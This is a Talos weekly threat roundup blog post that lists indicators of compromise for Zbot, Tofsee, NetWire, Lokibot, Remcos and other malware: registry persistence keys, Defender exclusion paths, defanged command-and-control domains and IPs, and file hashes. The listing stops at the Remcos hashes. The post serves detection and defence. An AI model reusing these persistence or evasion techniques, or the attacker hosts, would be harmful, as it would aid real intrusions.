Friday, October 15, 2021

Threat Roundup for October 8 to October 15


Today, Talos is publishing a glimpse into the most prevalent threats we've observed between Oct. 8 and Oct. 15. As with previous roundups, this post isn't meant to be an in-depth analysis. Instead, this post will summarize the threats we've observed by highlighting key behavioral characteristics, indicators of compromise, and discussing how our customers are automatically protected from these threats.

As a reminder, the information provided for the following threats in this post is non-exhaustive and current as of the date of publication. Additionally, please keep in mind that IOC searching is only one part of threat hunting. Spotting a single IOC does not necessarily indicate maliciousness. Detection and coverage for the following threats is subject to updates, pending additional threat or vulnerability analysis. For the most current information, please refer to your Firepower Management Center, Snort.org, or ClamAV.net.

For each threat described below, this blog post only lists 25 of the associated file hashes and up to 25 IOCs for each category. An accompanying JSON file can be found here that includes the complete list of file hashes, as well as all other IOCs from this post. A visual depiction of the MITRE ATT&CK techniques associated with each threat is also shown. In these images, the brightness of the technique indicates how prevalent it is across all threat files where dynamic analysis was conducted. There are five distinct shades that are used, with the darkest indicating that no files exhibited technique behavior and the brightest indicating that technique behavior was observed from 75 percent or more of the files.

The most prevalent threats highlighted in this roundup are:

Threat Name Type Description
Win.Trojan.Zbot-9899961-0 Trojan Zbot, also known as Zeus, is a trojan that steals information, such as banking credentials, using methods such as key-logging and form-grabbing.
Win.Packed.Tofsee-9900223-1 Packed Tofsee is multi-purpose malware that features a number of modules used to carry out various activities such as sending spam messages, conducting click fraud, mining cryptocurrency, and more. Infected systems become part of the Tofsee spam botnet and are used to send large volumes of spam messages to infect additional systems and increase the size of the botnet under the operator's control.
Win.Dropper.NetWire-9900023-0 Dropper NetWire is a remote access trojan (RAT) that allows attackers to execute commands on the infected host, log keystrokes, interact with a webcam, remote desktop, and read data from connected USB devices. NetWire is commonly delivered through Microsoft Office documents with macros, sent as attachments on malicious emails.
Win.Dropper.Lokibot-9900252-1 Dropper Lokibot is an information-stealing malware that siphons off sensitive information stored on an infected device. It is modular in nature, and contains the ability to steal sensitive information from a number of popular applications. It is commonly pushed via malicious documents delivered via spam emails.
Win.Dropper.Remcos-9900255-1 Dropper Remcos is a remote access trojan (RAT) that allows attackers to execute commands on the infected host, log keystrokes, interact with a webcam, and capture screenshots. This malware is commonly delivered through Microsoft Office documents with macros, sent as attachments on malicious emails.
Win.Trojan.Fareit-9900344-0 Trojan The Fareit trojan is primarily an information stealer with the functionality to download and install other malware.
Win.Packed.Passwordstealera-9900629-0 Packed This malware has the ability to harvest stored credentials, keystrokes, screenshots, network activity and more from computers where the software is installed.
Win.Ransomware.TeslaCrypt-9901319-0 Ransomware TeslaCrypt is a well-known ransomware family that encrypts a user's files with strong encryption and demands Bitcoin in exchange for a file decryption service. A flaw in the encryption algorithm was discovered that allowed files to be decrypted without paying the ransomware, and eventually, the malware developers released the master key allowing all encrypted files to be recovered easily.
Win.Packed.Cryptbot-9901331-1 Packed Cryptbot is an information-stealing trojan that attempts to siphon off passwords and other credentials on an infected machine. It typically masquerades as legitimate software to trick users into installing it.

Threat Breakdown

Win.Trojan.Zbot-9899961-0

Indicators of Compromise

  • IOCs collected from dynamic analysis of 22 samples
Registry Keys Occurrences
<HKCR>\LOCAL SETTINGS\SOFTWARE\MICROSOFT\WINDOWS\SHELL\BAGS\159 22
<HKCU>\SOFTWARE\MICROSOFT\IKCUPIZOYJI 1
<HKCU>\SOFTWARE\MICROSOFT\IKCUPIZOYJI
Value Name: 9c6ce2j
1
<HKCU>\SOFTWARE\MICROSOFT\WINDOWS\CURRENTVERSION\RUN
Value Name: Obofor
1
<HKCU>\SOFTWARE\MICROSOFT\IKCUPIZOYJI
Value Name: 1e3a7hgh
1
<HKCU>\SOFTWARE\MICROSOFT\IKCUPIZOYJI
Value Name: e3d4491
1
Mutexes Occurrences
GLOBAL\{<random GUID>} 1
Local\{<random GUID>} 1
IP Addresses contacted by malware. Does not indicate maliciousness Occurrences
172[.]245[.]217[.]122 1
60[.]244[.]81[.]6 1
207[.]251[.]45[.]31 1
84[.]59[.]129[.]23 1
27[.]54[.]110[.]77 1
81[.]148[.]242[.]90 1
36[.]2[.]242[.]186 1
81[.]149[.]16[.]130 1
81[.]130[.]77[.]220 1
107[.]196[.]239[.]26 1
180[.]10[.]151[.]221 1
58[.]1[.]158[.]10 1
81[.]136[.]182[.]103 1
88[.]104[.]169[.]182 1
142[.]250[.]80[.]100 1
62[.]49[.]180[.]189 1
124[.]5[.]53[.]61 1
121[.]6[.]46[.]119 1
61[.]32[.]242[.]131 1
110[.]233[.]103[.]240 1
Domain Names contacted by malware. Does not indicate maliciousness Occurrences
www[.]google[.]com 1
ydilzdwgciqtsfuaiixknorc[.]ru 1
kfnvidqvobiojwguwtgdehau[.]com 1
yxxcwgqgrwibkvlzfehyhmtsjrrg[.]net 1
inrcsclzprjeixkwbqifzmtsfi[.]biz 1
ovlvaxytsgqgzxeaobhlbheukukkr[.]info 1
dxprmnlvswqohhifdqemfrs[.]com 1
wggmcazzdxgjzozllfaixsocmkj[.]ru 1
aexhilzfqgqcakjlrpvuxskjsc[.]com 1
ceptqsbpbrgbajbqssccmrey[.]biz 1
nzxvoautaehugapjpzsodyzhl[.]org 1
fakfxkltovknvddhdxh[.]net 1
ausorwaqircmusgumfqctgcawoobaeci[.]com 1
xzlvxukhzmwktprqspyphxw[.]ru 1
eanzuotopfjfxcavkjbnrnxcjbto[.]biz 1
wsdqgxwwkbujbxylvqgrxs[.]net 1
fpzmnlgmqdaqodaxspfqf[.]org 1
cqxtoyfusdacewccqtlncexdt[.]info 1
nbuoqpjlfapvuktdeucscdysoln[.]com 1
qgcqpeqaerfdmbsjfyxdehmr[.]ru 1
dmfugxksklrcelgemzaskgq[.]com 1
tbqakdifzhhqhpxdyylt[.]info 1
futgijlbvwlnzpttdhayxdfqeu[.]org 1
vcltwldqugijsovgxcvtxroay[.]net 1
fynfvoswvoddegyiambucmgqrx[.]biz 1
*See JSON for more IOCs
Files and or directories created Occurrences
%TEMP%\NSO9414.bat 1
%HOMEPATH%\AppData\LocalLow\ytbaom.igy 1
%APPDATA%\Etqai 1
%APPDATA%\Etqai\obofor.exe 1
%TEMP%\ADA997F.bat 1
%APPDATA%\Evhye\mizadi.exe 1

File Hashes

06fc89139134d666ecb63b8d8424369b2e430ec8c1ab3627604bec9ec290e84f 0cb01840fad8fc67e35e605ef678c8736a01f2e26dbc8de5c5ca9cd41b8ed504 34d9bd87c62de80966f17159843d5fbd4b73cbb73920f5b4d583093d88e91c8d 435597b4851952338f1cea3ff0921e83d7d6ba526b6162c45b0701b247c749ee 4eb76e2435962519e254c6340d610b29e58bdc310df2b1e2b090bb70efa3ec09 5441f7781ac766e5d41e1c0a47b5840e6ea29a2b1b589d7610351b406d0d2f4f 58c3e7d4d7db837100d6aafc739066ed0b913cec9562e104c04eeec28adceb96 5e2ac43c4a2bf2a555a4af963036b824cd0f4b41a02655a20427ceccc65caaa8 5e5515ea30e8d86c7c31f01b223aadd4213f3b56faf7578ba375846df189eb01 6688741221a384dca9c9101abf7da2e2d60fb6f8e1e1c06f49eb2fa9a3f681c8 74c4ab4ddbac32a33caa989cf83a4809534409e8671ccc03c79dc52a85407acc 76e8b95cf47146e70798803063acbf44856ac829dc74bc58cedb8ca759ce8971 a0b2c7f633b19cae26651472228c38a38ce2732ee537860794cca12a6402ad95 aeeb3b332819c870791ca9af32ffe698d6b1fc7353a7c4f90448ce687630d528 af44c034319285e5e80e688360ae7546f628d983311a88b607c190380a8d1ef4 c21d16c98ba7e278cadb033ce10ef94e098007ece1a24624b36580b32f83ced7 d070ba7763258fc643ac23b3148e773c28470d3c07736ee8cd86a8cc171d7c81 d970e6c91a2894cf8bd7ca454cd9e173a25c199cf1be60977b76cd96029bd060 dba87f9c4f743944d3cc41746cc5c0804a2e0e7c5db2376809068c78f55d5ec8 f2bee2cd800b05408cd918ca8dad8076d9435f0ee4ade64642780359e5b5abc8 fd3395c065898fc2bc1a809652b3e88b90e498ae34f1caa8a65d9c725348239a fe1b587eb2ff65101b410ce28bd23489f411a6208a6aca45e0df5c9910709c67

Coverage

Product Protection
Secure Endpoint This has coverage
Cloudlock N/A
CWS This has coverage
Email Security This has coverage
Network Security This has coverage
Stealthwatch N/A
Stealthwatch Cloud N/A
Secure Malware Analytics This has coverage
Umbrella N/A
WSA This has coverage

Screenshots of Detection

Secure Endpoint



Secure Malware Analytics



MITRE ATT&CK





Win.Packed.Tofsee-9900223-1

Indicators of Compromise

  • IOCs collected from dynamic analysis of 42 samples
Registry Keys Occurrences
<HKU>\.DEFAULT\CONTROL PANEL\BUSES
Value Name: Config4
22
<HKU>\.DEFAULT\CONTROL PANEL\BUSES 22
<HKCR>\LOCAL SETTINGS\SOFTWARE\MICROSOFT\WINDOWS\SHELL\BAGS\159 22
<HKLM>\SYSTEM\CONTROLSET001\SERVICES\<random, matching '[A-Z0-9]{8}'> 22
<HKLM>\SYSTEM\CONTROLSET001\SERVICES\<random, matching '[A-Z0-9]{8}'>
Value Name: Type
22
<HKLM>\SYSTEM\CONTROLSET001\SERVICES\<random, matching '[A-Z0-9]{8}'>
Value Name: Start
22
<HKLM>\SYSTEM\CONTROLSET001\SERVICES\<random, matching '[A-Z0-9]{8}'>
Value Name: ErrorControl
22
<HKLM>\SYSTEM\CONTROLSET001\SERVICES\<random, matching '[A-Z0-9]{8}'>
Value Name: DisplayName
22
<HKLM>\SYSTEM\CONTROLSET001\SERVICES\<random, matching '[A-Z0-9]{8}'>
Value Name: WOW64
22
<HKLM>\SYSTEM\CONTROLSET001\SERVICES\<random, matching '[A-Z0-9]{8}'>
Value Name: ObjectName
22
<HKLM>\SYSTEM\CONTROLSET001\SERVICES\<random, matching '[A-Z0-9]{8}'>
Value Name: Description
22
<HKU>\.DEFAULT\CONTROL PANEL\BUSES
Value Name: Config1
22
<HKU>\.DEFAULT\CONTROL PANEL\BUSES
Value Name: Config2
22
<HKU>\.DEFAULT\CONTROL PANEL\BUSES
Value Name: Config3
22
<HKU>\.DEFAULT\CONTROL PANEL\BUSES
Value Name: Config0
22
<HKLM>\SYSTEM\CONTROLSET001\SERVICES\<random, matching '[A-Z0-9]{8}'>
Value Name: ImagePath
18
<HKLM>\SOFTWARE\MICROSOFT\WINDOWS DEFENDER\EXCLUSIONS\PATHS
Value Name: C:\Windows\SysWOW64\yikfbtso
3
<HKLM>\SOFTWARE\MICROSOFT\WINDOWS DEFENDER\EXCLUSIONS\PATHS
Value Name: C:\Windows\SysWOW64\oyavrjie
2
<HKLM>\SOFTWARE\MICROSOFT\WINDOWS DEFENDER\EXCLUSIONS\PATHS
Value Name: C:\Windows\SysWOW64\vfhcyqpl
2
<HKLM>\SOFTWARE\MICROSOFT\WINDOWS DEFENDER\EXCLUSIONS\PATHS
Value Name: C:\Windows\SysWOW64\eoqlhzyu
2
<HKLM>\SOFTWARE\MICROSOFT\WINDOWS DEFENDER\EXCLUSIONS\PATHS
Value Name: C:\Windows\SysWOW64\xhjeasrn
2
<HKLM>\SOFTWARE\MICROSOFT\WINDOWS DEFENDER\EXCLUSIONS\PATHS
Value Name: C:\Windows\SysWOW64\nxzuqihd
1
<HKLM>\SOFTWARE\MICROSOFT\WINDOWS DEFENDER\EXCLUSIONS\PATHS
Value Name: C:\Windows\SysWOW64\mwytphgc
1
<HKLM>\SOFTWARE\MICROSOFT\WINDOWS DEFENDER\EXCLUSIONS\PATHS
Value Name: C:\Windows\SysWOW64\wgidzrqm
1
<HKLM>\SOFTWARE\MICROSOFT\WINDOWS DEFENDER\EXCLUSIONS\PATHS
Value Name: C:\Windows\SysWOW64\pzbwskjf
1
IP Addresses contacted by malware. Does not indicate maliciousness Occurrences
193[.]56[.]146[.]42/31 36
213[.]91[.]128[.]133 31
64[.]233[.]186[.]26/31 28
74[.]208[.]5[.]20/31 26
77[.]75[.]78[.]42 25
157[.]240[.]2[.]174 25
209[.]85[.]201[.]106 25
211[.]231[.]108[.]46/31 23
67[.]195[.]204[.]72/30 23
216[.]163[.]188[.]54 22
193[.]56[.]146[.]188 22
193[.]56[.]146[.]41 22
185[.]253[.]219[.]200 22
51[.]158[.]144[.]223 22
91[.]219[.]63[.]95 22
193[.]222[.]135[.]150 21
34[.]223[.]6[.]127 20
51[.]81[.]57[.]58/31 20
209[.]85[.]202[.]26/31 19
194[.]25[.]134[.]8/31 19
144[.]160[.]235[.]143 18
67[.]231[.]149[.]140 17
211[.]231[.]108[.]174/31 17
62[.]141[.]42[.]208 17
96[.]114[.]157[.]80 16
*See JSON for more IOCs
Domain Names contacted by malware. Does not indicate maliciousness Occurrences
nam[.]olc[.]protection[.]outlook[.]com 27
emig[.]freenet[.]de 25
freenet[.]de 24
mailinator[.]com 23
www[.]google[.]com 22
windowslive[.]com 22
defeatwax[.]ru 22
www[.]instagram[.]com 20
aspmx[.]l[.]google[.]com 20
mail[.]h-email[.]net 20
mx[.]tlen[.]pl 20
alt2[.]aspmx[.]l[.]google[.]com 19
mx-aol[.]mail[.]gm0[.]yahoodns[.]net 19
mx76[.]mb1p[.]com 18
al-ip4-mx-vip1[.]prodigy[.]net 18
gmlil[.]com 18
mx0a-00191d01[.]pphosted[.]com 17
ameritrade[.]com 17
mxa-000cb501[.]gslb[.]pphosted[.]com 17
naver[.]com 16
comcast[.]net 16
wp[.]pl 16
park-mx[.]above[.]com 16
mx1[.]comcast[.]net 16
mx00[.]mail[.]com 16
*See JSON for more IOCs
Files and or directories created Occurrences
%TEMP%\<random, matching '[a-z]{8}'>.exe 36
%System32%\config\systemprofile:.repos 35
%System32%\<random, matching '[a-z]{7,8}'>\<random, matching '[a-z]{6,8}'>.exe (copy) 35
%SystemRoot%\SysWOW64\config\systemprofile 22
%SystemRoot%\SysWOW64\config\systemprofile:.repos 22
%SystemRoot%\SysWOW64\<random, matching '[a-z]{8}'> 21
%TEMP%\glhzxam.exe 1
%TEMP%\fkgywzl.exe 1
%TEMP%\otphfiu.exe 1

File Hashes

05b295f76210a5c35f81b1401e3dbaec82f586af2bdda6097e3018b3b5a582f8 098897160bb68ec7517929378d806c33427b23fa993d29ac1be9480c7c51b013 0d3fb154fd7e60a3dfe9427c3fdd15e7ae236a628100325ec951c76528f260f1 1d1275c73beab966955c8b12aa9abf544975cb2b10d3960136654a125058be29 1e0402ee6bffcfe8bc2fe71b72deba5e06e472710f73b6994becfcf3054fecdc 210501712b0477ab9961cb03d568016a71fcef37dd3c37753ebd5a101806c914 224b7c63bdf72f9846fb62b03d24c40e1ee77b8d0e4cc24f85aa5bf458a32c7d 2af4a58ee4988b8e75c4e204220ff35feda0f4a4155d1392adad97a2f6fcbf78 32dc3fd796aeb1f0850a7cb6bdfd78d87cb3c6bac47c6f95bd2ec788f8048e38 3647324458d4da70731307298684c543bb3a87da0a016a4c5ecf1aa306dacff0 36d9b2a3ebc3169cc671a8da349859fa1f89e86cc1bdb0455f61df2701377096 3b123ccf9b71071283d19a3508e29c2fdcea95d235501b45f466e1b36464c940 406f17dd277c82957844f527c305aedeb35f191316f8f7f446de2bd2b61318a7 4901044317c39e936e5dd8a8b3adced74b24678cbc0c63bd335a919bca53c786 4c2fbaa5ce4e314c380861ccd3fc4ce32a8da8cbe1ee687ac9f1ed401bd1aa84 4e984dbad4076087c12a33c0a45ee198eb219ceb25e63b30bb5f44aafcc9dc65 4f51f71233d3419b614829f6ccf6428e5e0e0fadfee8b0f8e43e5fb2d81a19ba 5171f07405ec0bf0a9efe5db173bfe5488e20eebaa3c6487826bffa3a7a4d31c 56be72e50d0c5d1d2bac4591430834b9026321043fd05cfcbea0a8be9fa9b108 5862134fc6f0e8c499763918f32b4e83f3eb1451e20b26aac3125c7b72bdc5d9 59e7b8479490aa1c94ce8f99a2752836c395388eaf55edb3e048fffd00a40975 5aa3c6fed81b079e11da4b83d5af438649d54eaa97c3a58a5f2521ffefe4ec79 5fb8d8a4fe8087758141af18cf014ba8ff05974521bcfb1ae7f831d8b4624cb7 610917410ad66c33d27504568bcef08caebfc3999f6baa2b83a13212d50aae09 614d040ab4a282da5a66381e58230d81962cb2f5551cb8b13ed6e5c212eb32cd
*See JSON for more IOCs

Coverage

Product Protection
Secure Endpoint This has coverage
Cloudlock N/A
CWS This has coverage
Email Security This has coverage
Network Security This has coverage
Stealthwatch N/A
Stealthwatch Cloud N/A
Secure Malware Analytics This has coverage
Umbrella This has coverage
WSA This has coverage

Screenshots of Detection

Secure Endpoint



Secure Malware Analytics



MITRE ATT&CK





Win.Dropper.NetWire-9900023-0

Indicators of Compromise

  • IOCs collected from dynamic analysis of 19 samples
Registry Keys Occurrences
<HKCR>\LOCAL SETTINGS\SOFTWARE\MICROSOFT\WINDOWS\SHELL\BAGS\159 19
<HKLM>\SOFTWARE\WOW6432NODE\MICROSOFT\WINDOWS\CURRENTVERSION\RUN
Value Name: bfsvc.exe
1
<HKLM>\SOFTWARE\MICROSOFT\WINDOWS\CURRENTVERSION\RUN
Value Name: displaykey
1
<HKLM>\SOFTWARE\MICROSOFT\WINDOWS\CURRENTVERSION\RUN
Value Name: sdiufsdoufbosdfusdf
1
<HKLM>\SOFTWARE\MICROSOFT\WINDOWS\CURRENTVERSION\RUN
Value Name: MSBuild
1
<HKLM>\SOFTWARE\MICROSOFT\WINDOWS\CURRENTVERSION\RUN
Value Name: siucxyviusdddss
1
<HKLM>\SOFTWARE\MICROSOFT\WINDOWS\CURRENTVERSION\RUN
Value Name: slidnfousdbnfousdfnsdf
1
<HKLM>\SOFTWARE\WOW6432NODE\MICROSOFT\WINDOWS\CURRENTVERSION\RUN
Value Name: svhost
1
<HKLM>\SOFTWARE\WOW6432NODE\MICROSOFT\WINDOWS\CURRENTVERSION\RUN
Value Name: Skype
1
<HKLM>\SOFTWARE\MICROSOFT\WINDOWS\CURRENTVERSION\RUN
Value Name: notepad
1
<HKLM>\SOFTWARE\MICROSOFT\WINDOWS\CURRENTVERSION\RUN
Value Name: Fenrir
1
<HKLM>\SOFTWARE\WOW6432NODE\MICROSOFT\WINDOWS\CURRENTVERSION\RUN
Value Name: ssssfdgvsdVCaWDEWFEGFDSVSDFGVSD22225R2WER
1
<HKLM>\SOFTWARE\WOW6432NODE\MICROSOFT\WINDOWS\CURRENTVERSION\RUN
Value Name: Microsoft Window
1
<HKLM>\SOFTWARE\MICROSOFT\WINDOWS\CURRENTVERSION\RUN
Value Name: asiuydyxcyccc
1
<HKLM>\SOFTWARE\MICROSOFT\WINDOWS\CURRENTVERSION\RUN
Value Name: otuuzbek
1
<HKLM>\SOFTWARE\WOW6432NODE\MICROSOFT\WINDOWS\CURRENTVERSION\RUN
Value Name: svchost0982374-2390487
1
Mutexes Occurrences
- 3
9DAA44F7C7955D46445DC99B 2
OWZCEN323F 1
Remcos_Mutex_Inj 1
vPrrgJFBbFCMmRUhAAGLuHLEYE 1
owGYbEgeDqGveNidINrSFcoig 1
QDHTMSVRYiErLTwFAkbXeSovWEgc 1
gSioxDHMmpAClwRUURwVFgNXbNJ 1
grLGSEYGsNmDzYoikpeuiegAHb 1
aozZhEtRlqmIFFBMlmiEGFxSAJ 1
WavvxbajmYFqTEIJmcJwmYEOGpMjB 1
gqpTIzHLPzoNMEdnaQAcEILEclD 1
JwLTUxlnbqnMViQskymNhEXZIKo 1
vLMEQNzQeVTgibLFhAFuHmztiJcByR 1
Remcos-LKK4DE 1
JVSTrufO 1
Rhuuhhrhhrggdgeyeyey-NJ0NI8 1
Remcos-5JSLAN 1
Domain Names contacted by malware. Does not indicate maliciousness Occurrences
cb7cb7[.]ddns[.]net 3
myp0nysite[.]ru 1
striker99[.]webhop[.]info 1
gamestrones54[.]myvnc[.]com 1
andybestbbcllc[.]eu 1
saferlife[.]tk 1
myshadyte[.]ru 1
0x0[.]ignorelist[.]com 1
ddns[.]njegidi888[.]xyz 1
gobishopa[.]ddns[.]net 1
Files and or directories created Occurrences
%LOCALAPPDATA%\Microsoft\CLR_v2.0_32\UsageLogs\<exe name>.log 19
%APPDATA%\Oracle\svhost.exe 5
%APPDATA%\Oracle 3
%APPDATA%\7C7955\5D4644.lck 2
%APPDATA%\Microsoft\Crypto\RSA\S-1-5-21-1160359183-2529320614-3255788068-500\a18ca4003deb042bbee7a40f15e1970b_24e2b309-1719-4436-b195-573e7cb0f5b1 2
%APPDATA%\OWZCEN323F 1
%APPDATA%\OWZCEN323F\bfsvc.exe 1
%APPDATA%\Install\.IgHiJkLiO 1
%APPDATA%\remcos\logs.dat 1
%TEMP%\~$fil.xlsx 1
%TEMP%\fil.xlsx 1
%APPDATA%\OWZCEN323F\winhlp32.exe 1
%TEMP%\94218.bat 1
%APPDATA%\Install\MSBuild.exe 1
%APPDATA%\lkjhs.dat 1
%TEMP%\97156.bat 1

File Hashes

16ab66fb13e33162cc1fff06910e9dfe519047e57f8db7e9168ffcac8dfc2023 2f89de6cbb7627c7126e1d9d3c52caae9db40dba49d8da8aace4af95f4b51f43 48afbdfad9120c807565d8b5bc059b48eb46da249a49e23034cec0239d0275f4 50eb9ee080ec53eb7f28421437461c87fd5c3c8dfb886951fc716c21e055b7dc 57bdc5098f339386a61494dc55866d940962ec5549b12646360dc3be8da40bb3 5ab39930697efa755d80a8731ac9b00090de4a2063133969d879183bc109ccd8 5dc3e14513b09a5bfe3569e6df3e69cf5b5252c079ae7ae7d5291a226e728b49 6d10b98d537d39c0b756ad4c015c132d54d7fe1e79d9fd47bf50e2fa29eb5c4b 75a540fa5ca0d41da3b672a41a32f21d81a5afb3b4a4d5f2e4236840c0fa1e11 9c512a0e999eb8b28fa2517d0cac29c5784e225cd3c70416c68d018f7c95b1cc 9eabb24bf7de07062560284a4a709980608646d67ddacde158cb652d9e04b80d af0b12ff1e123364beea9e42b5978b176bbfde2a7c9c186b895d214be5eb943c b08403ecf17daa804a05d806e4c08e3d743665de738668f4ec5decd77f99c149 b14f9b96e395a34cb150c5bea059cf07a70eb843c3ca8047a2b45c98399e5ff8 b34d982450dc9d794f9cf3a03bd08e71472e2d165c2c97f07bf175a4b89f356b d57cfdba7d7bd8960781096927de972b1e2848353cb95115091cbb8e067901e0 dc5d43376b8ce662043dffe0e84a1009bcfb711c87f206bfbe1add9ca71c35cf e3b995145da9f749ff132292c0c9db031dc83599c092ba247c5faacbd1e0b63e ee908ab8413736089d1569e8035c2a8e1486894745579dbd1382425dcfe6fc1b

Coverage

Product Protection
Secure Endpoint This has coverage
Cloudlock N/A
CWS This has coverage
Email Security This has coverage
Network Security N/A
Stealthwatch N/A
Stealthwatch Cloud N/A
Secure Malware Analytics This has coverage
Umbrella This has coverage
WSA This has coverage

Screenshots of Detection

Secure Endpoint



Secure Malware Analytics



MITRE ATT&CK





Win.Dropper.Lokibot-9900252-1

Indicators of Compromise

  • IOCs collected from dynamic analysis of 49 samples
Registry Keys Occurrences
<HKCR>\LOCAL SETTINGS\SOFTWARE\MICROSOFT\WINDOWS\SHELL\BAGS\159 49
Mutexes Occurrences
3749282D282E1E80C56CAE5A 42
9DAA44F7C7955D46445DC99B 22
Global\ae937b61-224a-11ec-b5f8-00501e3ae7b6 1
Global\73856101-224a-11ec-b5f8-00501e3ae7b6 1
Domain Names contacted by malware. Does not indicate maliciousness Occurrences
phoenixdevs[.]ir 42
Files and or directories created Occurrences
%APPDATA%\D282E1 42
%APPDATA%\D282E1\1E80C5.lck 42
%APPDATA%\Microsoft\Crypto\RSA\S-1-5-21-2580483871-590521980-3826313501-500\a18ca4003deb042bbee7a40f15e1970b_d19ab989-a35f-4710-83df-7b2db7efe7c5 42
\TEMP\test.exe 42
\test.exe 22
%APPDATA%\7C7955\5D4644.lck 22
%APPDATA%\Microsoft\Crypto\RSA\S-1-5-21-1160359183-2529320614-3255788068-500\a18ca4003deb042bbee7a40f15e1970b_24e2b309-1719-4436-b195-573e7cb0f5b1 22
%APPDATA%\7C7955\5D4644.exe (copy) 22

File Hashes

0932df20b7fdba719fb12c42cf8e753c3a1991a03659d9016acfd350fce2e532 0be94df5efaa043004cf38f490e43cdd89de6efe46494e78343bdc35a82fdb72 0f4ad6c9e4dff4a6573c348536c4786f422cfafe9e32a2ff51f4a67ec0ac840c 14b59ddcec314d8a8827718c8c2ab1813e94fdbfcb9a9c2c83f8c9ca6f9ba607 16d1712c08aa27e463bd85001dac5bf25e1acbb3fa243093d11c3eec07f9e749 1dca4fd969ab57d61313673b99bc108a5cd618890ee204ef305d24276b307ad4 229efecf5666e40cfecd81a99219077332e33416a6b884417c9bdc7bda0060e6 27fabcbad58433e7359c62e483c137cb7f2cb24986c9fcf32a225d5d24ba541a 2e2f8ba4f8c92ec3265704f714281786914843eb63688392c5f36c53545f1156 2e450e37398fdf1f7b490b36ae8cdd028834d1920d88c0f6ebf58a77bbac36a3 306c15b9bf889cb4d73188a8659ba31823297c790afb69c20c203c888e16166f 30efc5f88fdb54d1c5c45291406c90bff9fe92f88cd9c338b7f1dc511bdc4994 318659e42020f1797d332c189c9eb7eb514748e4b4328a8307fbda3ee0cf5406 32d9664ea2a9feb4c3c9c7411e1e3ef2193bb65497520b46a2604013988f7124 3e05f082c6d538dbe9cf4a855cca7c48e2945de4fd0ebc2efc2df112812fcb34 44390f488bf5485b3eea9afea88adbf1899e4016f7999b1ea147c5a4d2f5be12 47d596618ac6f3e42a481a4f1b83618f6e63f06273ab3aeac5c55642bb597e85 4ea4c184c38296c29f041118524781d9b21331d72e966512cdd2f7b168b98321 518820ad0bbf4bed36c43b8eae49ea6253b8745b2755aca589a3f6ddb00db511 521e74284712326ad8acdb1dced9220abdc8d5cc80882ed9db621ed64a47944b 5696b51d3466d90dc619bcd3942d9648577a87e59de4e5d89ec2ccd11cd94e48 5c093a78cab8e5e07047ac3377d57a5ae0266d1a098de01ee4193c7e31c706f0 5c110becd3b774f8c0a249398a01a3e92f04c0a9881a700a45fe94016f55428f 5d796aa204229a3ac9e7d37b1e27618541af33ce3a34b1a43298bfc85807efcf 641ffdc5e6da4b2e32f6591e3e43f0edd71fb8483fe098a22cd90ba2f8df8203
*See JSON for more IOCs

Coverage

Product Protection
Secure Endpoint This has coverage
Cloudlock N/A
CWS This has coverage
Email Security This has coverage
Network Security This has coverage
Stealthwatch N/A
Stealthwatch Cloud N/A
Secure Malware Analytics This has coverage
Umbrella This has coverage
WSA This has coverage

Screenshots of Detection

Secure Endpoint



Secure Malware Analytics



MITRE ATT&CK





Win.Dropper.Remcos-9900255-1

Indicators of Compromise

  • IOCs collected from dynamic analysis of 47 samples
Registry Keys Occurrences
<HKCU>\SOFTWARE\REMCOS_EWBKENDENHPKPEP 31
<HKCU>\SOFTWARE\MICROSOFT\WINDOWS\CURRENTVERSION\RUN
Value Name: remcos
30
<HKCU>\SOFTWARE\REMCOS_EWBKENDENHPKPEP
Value Name: EXEpath
30
<HKCR>\LOCAL SETTINGS\SOFTWARE\MICROSOFT\WINDOWS\SHELL\BAGS\159 13
Mutexes Occurrences
Remcos_Mutex_Inj 30
remcos_ewbkendenhpkpep 30
Global\{176627fc-9b6d-4f0a-ab26-654a31d03cfd} 13
Global\be11e4e1-f6ea-11eb-b5f8-00501e3ae7b6 1
IP Addresses contacted by malware. Does not indicate maliciousness Occurrences
185[.]140[.]53[.]37 30
185[.]244[.]29[.]216 13
Files and or directories created Occurrences
\TEMP\test.exe 44
%TEMP%\install.bat 31
%SystemRoot%\remcos\remcos.exe 31
%APPDATA%\remcos 30
%SystemRoot%\remcos 30
\test.exe 22
%APPDATA%\D19AB989-A35F-4710-83DF-7B2DB7EFE7C5 13
%APPDATA%\D19AB989-A35F-4710-83DF-7B2DB7EFE7C5\Logs 13
%APPDATA%\D19AB989-A35F-4710-83DF-7B2DB7EFE7C5\Logs\Administrator 13
%APPDATA%\D19AB989-A35F-4710-83DF-7B2DB7EFE7C5\run.dat 13
%APPDATA%\24E2B309-1719-4436-B195-573E7CB0F5B1\run.dat 5
%LOCALAPPDATA%\Mozilla\Firefox\Profiles\ogpxv0ba.default\startupCache\scriptCache-child-new.bin 1
%LOCALAPPDATA%\Mozilla\Firefox\Profiles\ogpxv0ba.default\startupCache\scriptCache-child.bin (copy) 1
%LOCALAPPDATA%\Mozilla\Firefox\Profiles\ogpxv0ba.default\startupCache\scriptCache-new.bin 1
%LOCALAPPDATA%\Mozilla\Firefox\Profiles\ogpxv0ba.default\startupCache\scriptCache.bin (copy) 1
%LOCALAPPDATA%\Mozilla\Firefox\Profiles\ogpxv0ba.default\startupCache\startupCache.4.little 1
%LOCALAPPDATA%\Mozilla\Firefox\Profiles\ogpxv0ba.default\startupCache\urlCache-new.bin 1
%LOCALAPPDATA%\Mozilla\Firefox\Profiles\ogpxv0ba.default\startupCache\urlCache.bin (copy) 1
%APPDATA%\Mozilla\Firefox\Profiles\ogpxv0ba.default\addonStartup.json.lz4 (copy) 1
%APPDATA%\Mozilla\Firefox\Profiles\ogpxv0ba.default\addonStartup.json.lz4.tmp 1
%APPDATA%\Mozilla\Firefox\Profiles\ogpxv0ba.default\broadcast-listeners.json (copy) 1
%APPDATA%\Mozilla\Firefox\Profiles\ogpxv0ba.default\broadcast-listeners.json.tmp 1
%APPDATA%\Mozilla\Firefox\Profiles\ogpxv0ba.default\crashes\store.json.mozlz4 (copy) 1
%APPDATA%\Mozilla\Firefox\Profiles\ogpxv0ba.default\crashes\store.json.mozlz4.tmp 1
%APPDATA%\Mozilla\Firefox\Profiles\ogpxv0ba.default\datareporting\aborted-session-ping (copy) 1
*See JSON for more IOCs

File Hashes

